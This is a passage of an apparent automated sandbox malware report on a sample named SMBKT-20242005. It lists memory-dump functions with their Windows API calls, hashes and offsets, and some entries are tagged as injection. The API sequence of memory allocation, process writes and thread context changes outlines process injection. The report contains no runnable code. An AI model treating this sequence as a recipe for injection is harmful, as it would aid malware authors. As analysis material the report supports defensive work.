                          • Opcode Fuzzy Hash: 1e91ab7e8e060fafe7e88ae6b795d94a8afd4946d6309d21e46a5311487b53a6
                          • Instruction Fuzzy Hash: 64917B71D00219DFEB20CFA9CC41BEDBBB2BF44314F1585AAE918A7240DB75A985CF91
                          Function 0137B188 Relevance: 1.7, APIs: 1, Instructions: 197COMMON
                          Download Yara Rule
                          APIs
                          • GetModuleHandleW.KERNELBASE(00000000), ref: 0137B3DE
                          Memory Dump Source
                          • Source File: 00000001.00000002.1460819095.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_1370000_SMBKT-20242005.jbxd
                          Similarity
                          • API ID: HandleModule
                          • String ID:
                          • API String ID: 4139908857-0
                          • Opcode ID: 7e6ac2150cb07b70ddd3fd74f1dc8091de7194e16bcc2017c04b57fba4504ff3
                          • Instruction ID: 4571cb0b21d44cec63f4d696f1237da628048a4ee456aaaa445faed773b4ab32
                          • Opcode Fuzzy Hash: 7e6ac2150cb07b70ddd3fd74f1dc8091de7194e16bcc2017c04b57fba4504ff3
                          • Instruction Fuzzy Hash: B6713670A00B058FE734DF69D44579ABBF2FF88208F108A2DD49ADBA54D778E945CB90
                          Function 01375C9D Relevance: 1.6, APIs: 1, Instructions: 101COMMON
                          Download Yara Rule
                          APIs
                          • CreateActCtxA.KERNEL32(?), ref: 01375D59
                          Memory Dump Source
                          • Source File: 00000001.00000002.1460819095.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_1370000_SMBKT-20242005.jbxd
                          Similarity
                          • API ID: Create
                          • String ID:
                          • API String ID: 2289755597-0
                          • Opcode ID: 0ba6ebb8da578bae94d32cd92d5db25c622fc0a975fb6e9be378cf3e6a48a36a
                          • Instruction ID: 5ee5a226753466bfedb3b18e3e7abbefa70a188ee1e9798537fc805160f5cd42
                          • Opcode Fuzzy Hash: 0ba6ebb8da578bae94d32cd92d5db25c622fc0a975fb6e9be378cf3e6a48a36a
                          • Instruction Fuzzy Hash: 9141B2B0C00759CFEB24CFA9C844BDEBBB6BF49708F20846AD409AB251DB756946CF50
                          Function 013747F4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                          Download Yara Rule
                          APIs
                          • CreateActCtxA.KERNEL32(?), ref: 01375D59
                          Memory Dump Source
                          • Source File: 00000001.00000002.1460819095.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_1370000_SMBKT-20242005.jbxd
                          Similarity
                          • API ID: Create
                          • String ID:
                          • API String ID: 2289755597-0
                          • Opcode ID: 303916c23c68784cc0dda788cf57cf322831be1ff198646548aeb90881a2cda8
                          • Instruction ID: 2d5a0bc7c9001c6906fc8b3852ef12a1d02464cbebb0422a74eb12db02abdf7a
                          • Opcode Fuzzy Hash: 303916c23c68784cc0dda788cf57cf322831be1ff198646548aeb90881a2cda8
                          • Instruction Fuzzy Hash: B341B070C00719CFEB24DFAAC844BDEBBB6BF49704F20846AD409AB251DB756946CF50
                          Function 04DF2B18 Relevance: 1.6, APIs: 1, Instructions: 72injectionCOMMON
                          Download Yara Rule
                          APIs
                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 04DF2BB0
                          Memory Dump Source
                          • Source File: 00000001.00000002.1463956684.0000000004DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_4df0000_SMBKT-20242005.jbxd
                          Similarity
                          • API ID: MemoryProcessWrite
                          • String ID:
                          • API String ID: 3559483778-0
                          • Opcode ID: 494e87def2ce8a60f92b6d511df8506244de5610c5942702d22859f16a294aab
                          • Instruction ID: 6719c2c8530e4c23267fb7783a396ae31f81303b4380c4ce625d81fafea1fcbf
                          • Opcode Fuzzy Hash: 494e87def2ce8a60f92b6d511df8506244de5610c5942702d22859f16a294aab
                          • Instruction Fuzzy Hash: E0215A759103499FDB10CFA9C885BEEBBF5FF48310F14842AE958A7240C7799554CBA0
                          Function 04DF2B20 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                          Download Yara Rule
                          APIs
                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 04DF2BB0
                          Memory Dump Source
                          • Source File: 00000001.00000002.1463956684.0000000004DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_4df0000_SMBKT-20242005.jbxd
                          Similarity
                          • API ID: MemoryProcessWrite
                          • String ID:
                          • API String ID: 3559483778-0
                          • Opcode ID: f414c6661a9fcbc314130ec605bffc45bd09603007a7457e202f14657eefcf2c
                          • Instruction ID: 16df13358cf5f2e97e7710c5fb7596df45f3f5a670339a8decd64f8359918111
                          • Opcode Fuzzy Hash: f414c6661a9fcbc314130ec605bffc45bd09603007a7457e202f14657eefcf2c
                          • Instruction Fuzzy Hash: C12139759103499FDB10CFA9C885BDEBBF5FF48310F14842AE959A7340C779A944CBA0
                          Function 04DF2C08 Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                          Download Yara Rule
                          APIs
                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 04DF2C90
                          Memory Dump Source
                          • Source File: 00000001.00000002.1463956684.0000000004DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_4df0000_SMBKT-20242005.jbxd
                          Similarity
                          • API ID: MemoryProcessRead
                          • String ID:
                          • API String ID: 1726664587-0
                          • Opcode ID: 1d183cb7a5f2d860eb6a1482f78c8821b8a69ac82e7e7c8899bd9e13eba377ae
                          • Instruction ID: 16a88323112859f67e292a0f7d758dd7ee4e218fc79685c9f0bf16a73e1756d1
                          • Opcode Fuzzy Hash: 1d183cb7a5f2d860eb6a1482f78c8821b8a69ac82e7e7c8899bd9e13eba377ae
                          • Instruction Fuzzy Hash: 772136B580034A9FDB10DFAAD880BEEFBF5FF48310F14842AE958A7240D7799554CBA1
                          Function 04DF2548 Relevance: 1.6, APIs: 1, Instructions: 66threadCOMMON
                          Download Yara Rule
                          APIs
                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 04DF25CE
                          Memory Dump Source
                          • Source File: 00000001.00000002.1463956684.0000000004DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_4df0000_SMBKT-20242005.jbxd
                          Similarity
                          • API ID: ContextThreadWow64
                          • String ID:
                          • API String ID: 983334009-0
                          • Opcode ID: 7e7b7ef12a4e99f93d67b6bfa59ada9f31ee60df60de5eac379354ebef458cf8
                          • Instruction ID: 52db690a54e2ee5ed49e2a30e6249263a7f82067d87d62220f7ef9d0f0b9d6ba
                          • Opcode Fuzzy Hash: 7e7b7ef12a4e99f93d67b6bfa59ada9f31ee60df60de5eac379354ebef458cf8
                          • Instruction Fuzzy Hash: 9F213971D103098FDB10DFAAC4857EEBBF4AF88314F14842AD959A7340DB79A944CFA1
                          Function 0137D661 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                          Download Yara Rule
                          APIs
                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0137D6EF
                          Memory Dump Source
                          • Source File: 00000001.00000002.1460819095.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_1370000_SMBKT-20242005.jbxd
                          Similarity
                          • API ID: DuplicateHandle
                          • String ID:
                          • API String ID: 3793708945-0
                          • Opcode ID: a36b9481b7b979fc709b53679b31b3b61ca8e7914da839197a582b4359b93f23
                          • Instruction ID: b4be7bf6470bbf9658ed634717536351579eab266afbc8fbf29e2eccc6368c5d
                          • Opcode Fuzzy Hash: a36b9481b7b979fc709b53679b31b3b61ca8e7914da839197a582b4359b93f23
                          • Instruction Fuzzy Hash: 2B21E0B59002499FDB10CFAAD584AEEBBF5FF48324F14842AE918A7350D378A954CF60
                          Function 04DF2550 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                          Download Yara Rule
                          APIs
                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 04DF25CE
                          Memory Dump Source
                          • Source File: 00000001.00000002.1463956684.0000000004DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_4df0000_SMBKT-20242005.jbxd
                          Similarity
                          • API ID: ContextThreadWow64
                          • String ID:
                          • API String ID: 983334009-0
                          • Opcode ID: eedcdddb6d3702de306fc1ec273164ed9dd57632bc3dbf4644be6dfbf392bcbd
                          • Instruction ID: 6c770151772fb07c55f4ba84680cf8cd270196f040a6b34e4adef758864ddb88
                          • Opcode Fuzzy Hash: eedcdddb6d3702de306fc1ec273164ed9dd57632bc3dbf4644be6dfbf392bcbd
                          • Instruction Fuzzy Hash: F12127719103098FDB10DFAAC8857EEBBF4EF48324F14842AD559A7340DB79AA45CFA1
                          Function 04DF2C10 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                          Download Yara Rule
                          APIs
                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 04DF2C90
                          Memory Dump Source
                          • Source File: 00000001.00000002.1463956684.0000000004DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_4df0000_SMBKT-20242005.jbxd
                          Similarity
                          • API ID: MemoryProcessRead
                          • String ID:
                          • API String ID: 1726664587-0
                          • Opcode ID: e57925a2be525c79a57e878016cea7f07aa1853e162ba655d508112dc05a652e
                          • Instruction ID: f32900d84b1c619472eba9ce628ff1c32a298fbdb296eeb63783ec8634206687
                          • Opcode Fuzzy Hash: e57925a2be525c79a57e878016cea7f07aa1853e162ba655d508112dc05a652e
                          • Instruction Fuzzy Hash: 612128B58003499FDB10DFAAC881BEEBBF5FF48310F14842AE559A7240D7799540CBA1
                          Function 0137D668 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                          Download Yara Rule
                          APIs
                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0137D6EF
                          Memory Dump Source
                          • Source File: 00000001.00000002.1460819095.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_1370000_SMBKT-20242005.jbxd
                          Similarity
                          • API ID: DuplicateHandle
                          • String ID:
                          • API String ID: 3793708945-0
                          • Opcode ID: 2cdbc7f8e64b9f937305101fb8ec12fa68476b82bd19606c4ae1cdda85280606
                          • Instruction ID: e55e8bfc712ac69e9f77e4d07d15f6f82c7ad4139ada57f902b527434228727e
                          • Opcode Fuzzy Hash: 2cdbc7f8e64b9f937305101fb8ec12fa68476b82bd19606c4ae1cdda85280606
                          • Instruction Fuzzy Hash: B121E4B59002499FDB10CF9AD484ADEFBF4FF48310F14801AE918A3350D378A954CF60
                          Function 04DE2739 Relevance: 1.6, APIs: 1, Instructions: 59memoryCOMMON
                          Download Yara Rule
                          APIs
                          • VirtualProtect.KERNELBASE(?,?,?,?), ref: 04DE27B3
                          Memory Dump Source
                          • Source File: 00000001.00000002.1463924036.0000000004DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_4de0000_SMBKT-20242005.jbxd
                          Similarity
                          • API ID: ProtectVirtual
                          • String ID:
                          • API String ID: 544645111-0
                          • Opcode ID: bab2b77d29277bb44c63d68e67ccb6bbb0b6ab50964f48b545cdaf1e4547ff68
                          • Instruction ID: 6fa1ab7c03f0b26e6764839dced485dd2fcf2d2a29cce7b1ffdfe099a3650e63
                          • Opcode Fuzzy Hash: bab2b77d29277bb44c63d68e67ccb6bbb0b6ab50964f48b545cdaf1e4547ff68
                          • Instruction Fuzzy Hash: 5921E5759042499FDB10DFAAC484BDEBFF4EF49320F14806AE958A7251D374A944CFA1
                          Function 04DE2740 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON
                          Download Yara Rule
                          APIs
                          • VirtualProtect.KERNELBASE(?,?,?,?), ref: 04DE27B3
                          Memory Dump Source
                          • Source File: 00000001.00000002.1463924036.0000000004DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_4de0000_SMBKT-20242005.jbxd
                          Similarity
                          • API ID: ProtectVirtual
                          • String ID:
                          • API String ID: 544645111-0
                          • Opcode ID: dbe4b45014544537ef6fea56bb8f0a0ec05775522c391e5d251d6a735ac02cbe
                          • Instruction ID: 645fda646b0fe1a56a56e0760bd8b7728475159851693d8729fc98faa3b1a5cb
                          • Opcode Fuzzy Hash: dbe4b45014544537ef6fea56bb8f0a0ec05775522c391e5d251d6a735ac02cbe
                          • Instruction Fuzzy Hash: B721D6759002499FDB10DF9AC485BDEFBF4FB48310F108429E958A7250D778A944CFA1
                          Function 0137AB90 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                          Download Yara Rule
                          APIs
                          • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0137B459,00000800,00000000,00000000), ref: 0137B66A
                          Memory Dump Source
                          • Source File: 00000001.00000002.1460819095.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_1370000_SMBKT-20242005.jbxd
                          Similarity
                          • API ID: LibraryLoad
                          • String ID:
                          • API String ID: 1029625771-0
                          • Opcode ID: c811788f7fc502cab5fde960ef864ff3e19f985232b2aae06f3f76af7f96d678
                          • Instruction ID: d8ad3f8fcb71a8e8aaf5cb7a69f1c3b96d3647860e7e432e9f38871d22538808
                          • Opcode Fuzzy Hash: c811788f7fc502cab5fde960ef864ff3e19f985232b2aae06f3f76af7f96d678
                          • Instruction Fuzzy Hash: 4A1123B68003098FDB20DF9AC444BDEFBF4EB48324F10842EE919A7600C379A945CFA5
                          Function 0137B5F9 Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON
                          Download Yara Rule
                          APIs
                          • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0137B459,00000800,00000000,00000000), ref: 0137B66A
                          Memory Dump Source
                          • Source File: 00000001.00000002.1460819095.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_1370000_SMBKT-20242005.jbxd
                          Similarity
                          • API ID: LibraryLoad
                          • String ID:
                          • API String ID: 1029625771-0
                          • Opcode ID: 05c411c2344340283a0477e67644323be973220b6b7a5e87114cf94262f34fda
                          • Instruction ID: 753ca45e9846db63134e8c7414cc277e41d0a3a1cd1a1d79e73c6c7ed2d4dc7b
                          • Opcode Fuzzy Hash: 05c411c2344340283a0477e67644323be973220b6b7a5e87114cf94262f34fda
                          • Instruction Fuzzy Hash: 891112B68003098FDB20CF9AC844BDEFBF4EB88324F11842AD959A7610C379A545CFA5
                          Function 04DF2A60 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                          Download Yara Rule
                          APIs
                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 04DF2ACE
                          Memory Dump Source
                          • Source File: 00000001.00000002.1463956684.0000000004DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_4df0000_SMBKT-20242005.jbxd
                          Similarity
                          • API ID: AllocVirtual
                          • String ID:
                          • API String ID: 4275171209-0
                          • Opcode ID: b4081939bf1795afc6435a1b3580473334ab753a2f20de0b92c0cab8885a46b7
                          • Instruction ID: aaeaf7f98d67bab656e5ff8058b44ecbc9c8ab8b44a7828120c69d9f16785c78
                          • Opcode Fuzzy Hash: b4081939bf1795afc6435a1b3580473334ab753a2f20de0b92c0cab8885a46b7
                          • Instruction Fuzzy Hash: AA1149768003499FDB20DFAAC845BDFBBF5EF48320F14841AE519A7250C776A550CFA1
                          Function 04DF2498 Relevance: 1.6, APIs: 1, Instructions: 52threadCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000001.00000002.1463956684.0000000004DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_4df0000_SMBKT-20242005.jbxd
                          Similarity
                          • API ID: ResumeThread
                          • String ID:
                          • API String ID: 947044025-0
                          • Opcode ID: 7f48809c4761b8d3da9bb75c16d2094071ad7023ed18f01217c545a5bf8c43d4
                          • Instruction ID: d70f93ae88ac55e1a0ab549272ef3a2ffc5ab810a49780753d88d26c5d80d720
                          • Opcode Fuzzy Hash: 7f48809c4761b8d3da9bb75c16d2094071ad7023ed18f01217c545a5bf8c43d4
                          • Instruction Fuzzy Hash: CF115B718043498BDB20DFAAC8457EFFBF4EF48320F24841AD569A7380CB79A544CBA0
                          Function 04DF24A0 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000001.00000002.1463956684.0000000004DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_4df0000_SMBKT-20242005.jbxd
                          Similarity
                          • API ID: ResumeThread
                          • String ID:
                          • API String ID: 947044025-0
                          • Opcode ID: 660f31d704217713fc49fd7adb404647d612a12adae89df69a97ee300d4be270
                          • Instruction ID: 444156c7eb4ea95076861b6b6ddfca3dafdd2f7d883e95fd88b5a621b7936222
                          • Opcode Fuzzy Hash: 660f31d704217713fc49fd7adb404647d612a12adae89df69a97ee300d4be270
                          • Instruction Fuzzy Hash: E61128B19003498BDB20DFAAC8457DEFBF5AF48314F148419D519A7340CB79A544CBA1
                          Function 04DF7198 Relevance: 1.5, APIs: 1, Instructions: 49windowCOMMON
                          Download Yara Rule
                          APIs
                          • PostMessageW.USER32(?,00000010,00000000,?), ref: 04DF71FD
                          Memory Dump Source
                          • Source File: 00000001.00000002.1463956684.0000000004DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_4df0000_SMBKT-20242005.jbxd
                          Similarity
                          • API ID: MessagePost
                          • String ID:
                          • API String ID: 410705778-0
                          • Opcode ID: fd94590c2ea0472b4ffe1de39133b5813e4cdf0372010d04ca71431222f9aa4d
                          • Instruction ID: 29666c6829bb3a173b3c88df3529e95664767efac07644959a63209ca883fb3c
                          • Opcode Fuzzy Hash: fd94590c2ea0472b4ffe1de39133b5813e4cdf0372010d04ca71431222f9aa4d
                          • Instruction Fuzzy Hash: 6F1125B58003499FDB20DF9AD844BDEBFF8FB48310F10845AE954A3211C375A554CFA1
                          Function 04DF5368 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                          Download Yara Rule
                          APIs
                          • PostMessageW.USER32(?,00000010,00000000,?), ref: 04DF71FD
                          Memory Dump Source
                          • Source File: 00000001.00000002.1463956684.0000000004DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_4df0000_SMBKT-20242005.jbxd
                          Similarity
                          • API ID: MessagePost
                          • String ID:
                          • API String ID: 410705778-0
                          • Opcode ID: 5cad66747c627e529c17d3010e75a9de2b5c4888060e4ed40cb4be2fdf6aa9dd
                          • Instruction ID: efaba522fbb7ed75b5ed7140b8f81f076d28a0ee57017a680fa72dda581506f8
                          • Opcode Fuzzy Hash: 5cad66747c627e529c17d3010e75a9de2b5c4888060e4ed40cb4be2fdf6aa9dd
                          • Instruction Fuzzy Hash: F01103B58003499FDB20DF9AD885BDEBBF8FB48310F11841AE958A7340D3B5A944CFA1
                          Function 0137B378 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                          Download Yara Rule
                          APIs
                          • GetModuleHandleW.KERNELBASE(00000000), ref: 0137B3DE
                          Memory Dump Source
                          • Source File: 00000001.00000002.1460819095.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_1370000_SMBKT-20242005.jbxd
                          Similarity
                          • API ID: HandleModule
                          • String ID:
                          • API String ID: 4139908857-0
                          • Opcode ID: 2ef6f0c85d4c90740ec9583919b346435f5f178431570216b69d2efd3c40ef95
                          • Instruction ID: 91c2532b18ff32fe0f8ec1f0adda6aeb90dfc2381fd6fc02de027adb70a0e749
                          • Opcode Fuzzy Hash: 2ef6f0c85d4c90740ec9583919b346435f5f178431570216b69d2efd3c40ef95
                          • Instruction Fuzzy Hash: E011E0B5C006498FEB20CF9AC444BDEFBF4EF88214F10842AD929A7650D379A545CFA1
                          Function 08E9F0E6 Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.1465936940.0000000008E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E90000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_8e90000_SMBKT-20242005.jbxd
                          Similarity
                          • API ID:
                          • String ID: uS[
                          • API String ID: 0-1911296808
                          • Opcode ID: 9f278e811f4a128a0139782b95c7496721a8bdb951bbf8250584da29938c0301
                          • Instruction ID: b6ba9ea664c4266f2cb5294d348c66dfe2ee57d14f520d394e3792ff7b30f581
                          • Opcode Fuzzy Hash: 9f278e811f4a128a0139782b95c7496721a8bdb951bbf8250584da29938c0301
                          • Instruction Fuzzy Hash: E351E375905244CFDB40DFA4E989AECBBF5FB09302F1495A9D485DB386EBB09841CF50
                          Function 08E9F09A Relevance: 1.3, Strings: 1, Instructions: 35COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.1465936940.0000000008E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E90000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_8e90000_SMBKT-20242005.jbxd
                          Similarity
                          • API ID:
                          • String ID: uS[
                          • API String ID: 0-1911296808
                          • Opcode ID: 991ebcf71abec740ef17a841016c750004cc9acc1ed4a3c2b2bc1a86445ac4c2
                          • Instruction ID: bbe8f2f193128da31dcd9a880a1dd157839c0bc09de9800d84db518bc2733d42
                          • Opcode Fuzzy Hash: 991ebcf71abec740ef17a841016c750004cc9acc1ed4a3c2b2bc1a86445ac4c2
                          • Instruction Fuzzy Hash: BD014FB0A05349CFDB40EFD4E845AEC77B6FB48301F109A55D416EF788E77198458B60
                          Function 08E9F068 Relevance: 1.3, Strings: 1, Instructions: 28COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.1465936940.0000000008E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E90000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_8e90000_SMBKT-20242005.jbxd
                          Similarity
                          • API ID:
                          • String ID: uS[
                          • API String ID: 0-1911296808
                          • Opcode ID: 3e61bd23446458af9e167d5fe703f85bbacca93abe44eff126922fac10a15921
                          • Instruction ID: 39d10c01483cc6889dd2c1988652818582c0f1cf1b9ea16f56d2af78fdcd11f1
                          • Opcode Fuzzy Hash: 3e61bd23446458af9e167d5fe703f85bbacca93abe44eff126922fac10a15921
                          • Instruction Fuzzy Hash: 33F06D70A093898FCB40EFE4E854AEC7BB1FB48300F209A16D4559F789E7305845CB60
                          Function 08E96220 Relevance: 1.3, Strings: 1, Instructions: 23COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.1465936940.0000000008E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E90000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_8e90000_SMBKT-20242005.jbxd
                          Similarity
                          • API ID:
                          • String ID: un
                          • API String ID: 0-3067141278
                          • Opcode ID: e88280ed63f27f83321441e0cce917b3b2b5d78d18d3b8401f9af22ec7b0face
                          • Instruction ID: e1b8fec94b52578ef70ebc056e802bf56b06080f6ba60ca62b44c00b12c00e3d
                          • Opcode Fuzzy Hash: e88280ed63f27f83321441e0cce917b3b2b5d78d18d3b8401f9af22ec7b0face
                          • Instruction Fuzzy Hash: 4EE04F2618C3C4AFDF221BA098216753F799B5361AF1D50AFE1C4891A2D9978406C735
                          Function 08E96230 Relevance: 1.3, Strings: 1, Instructions: 19COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.1465936940.0000000008E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E90000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_8e90000_SMBKT-20242005.jbxd
                          Similarity
                          • API ID:
                          • String ID: un
                          • API String ID: 0-3067141278
                          • Opcode ID: fe2f3a90d41fc91201be7915e85a23d1cb2cff28174cb0f5d8298cd95dc6b937
                          • Instruction ID: 17ad87d83652d557a92e057a77d8c0be62a5a5a56dbd949dd0a93fc7493de1fc
                          • Opcode Fuzzy Hash: fe2f3a90d41fc91201be7915e85a23d1cb2cff28174cb0f5d8298cd95dc6b937
                          • Instruction Fuzzy Hash: A0D05B3638431CEBDF3456D1E416739326DA795606F24811FF54595194DEB68400C735
                          Function 08E96BA2 Relevance: .2, Instructions: 194COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000001.00000002.1465936940.0000000008E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E90000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_8e90000_SMBKT-20242005.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6cb7f6b20f2731ef5553bb7429d375c34320ba1954d13bbd44541fb99f0006b5
                          • Instruction ID: c03849c6c3eb0d27d7d8848a47a050e77d0875251dc85cee5631b234b213ed96
                          • Opcode Fuzzy Hash: 6cb7f6b20f2731ef5553bb7429d375c34320ba1954d13bbd44541fb99f0006b5
                          • Instruction Fuzzy Hash: 81717136E48218DFDF15CB98C444BADB7B2FF90306F14942BE491AB2A4DBB09D42CB51
                          Function 08E95970 Relevance: .2, Instructions: 167COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000001.00000002.1465936940.0000000008E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E90000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_8e90000_SMBKT-20242005.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 9804ee6e91dcf1f154f8267004d171ff9552206efcab858f9df763656cb4b9eb
                          • Instruction ID: 3cfe6de4a4b846eca715c8519ec4161a6b0455b97d423823bc450517eafacdd0
                          • Opcode Fuzzy Hash: 9804ee6e91dcf1f154f8267004d171ff9552206efcab858f9df763656cb4b9eb
                          • Instruction Fuzzy Hash: E2518A327002058FDB25DF68C494BAAB7E6AF88319F14416DD45ACB3A0DBB5EC41CB50
                          Function 08E915C0 Relevance: .2, Instructions: 153COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000001.00000002.1465936940.0000000008E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E90000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_8e90000_SMBKT-20242005.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 29af3437b494ae8f36dc5c70d24c3d50d9e97809dd0189c6e9945a9e0b5cbd4b
                          • Instruction ID: f82985f7eb005ad0d348a9b8578f136b39fb556b104f1ac159de8a38088508e7
                          • Opcode Fuzzy Hash: 29af3437b494ae8f36dc5c70d24c3d50d9e97809dd0189c6e9945a9e0b5cbd4b
                          • Instruction Fuzzy Hash: 9E51B431A002099FDF05DFB488103AE7BB6BF8A211B148569D455EB384DE39D9418795
                          Function 08E9595F Relevance: .1, Instructions: 133COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000001.00000002.1465936940.0000000008E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E90000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_8e90000_SMBKT-20242005.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: edc257c363d2792261816ae611d4d40af787c719ab8580d1d659801150f45946
                          • Instruction ID: f0282501b0849f292a4f76fa79663c7c04e527956a044d111607a1a426a82635
                          • Opcode Fuzzy Hash: edc257c363d2792261816ae611d4d40af787c719ab8580d1d659801150f45946
                          • Instruction Fuzzy Hash: 6051A2317002059FDB16DF68C484B9EB7F6AF89319F18816DD44A9B3A1DBB5EC01CB91
                          Function 08E904D0 Relevance: .1, Instructions: 122COMMON
                          Download Yara Rule
                          Memory Dump Source
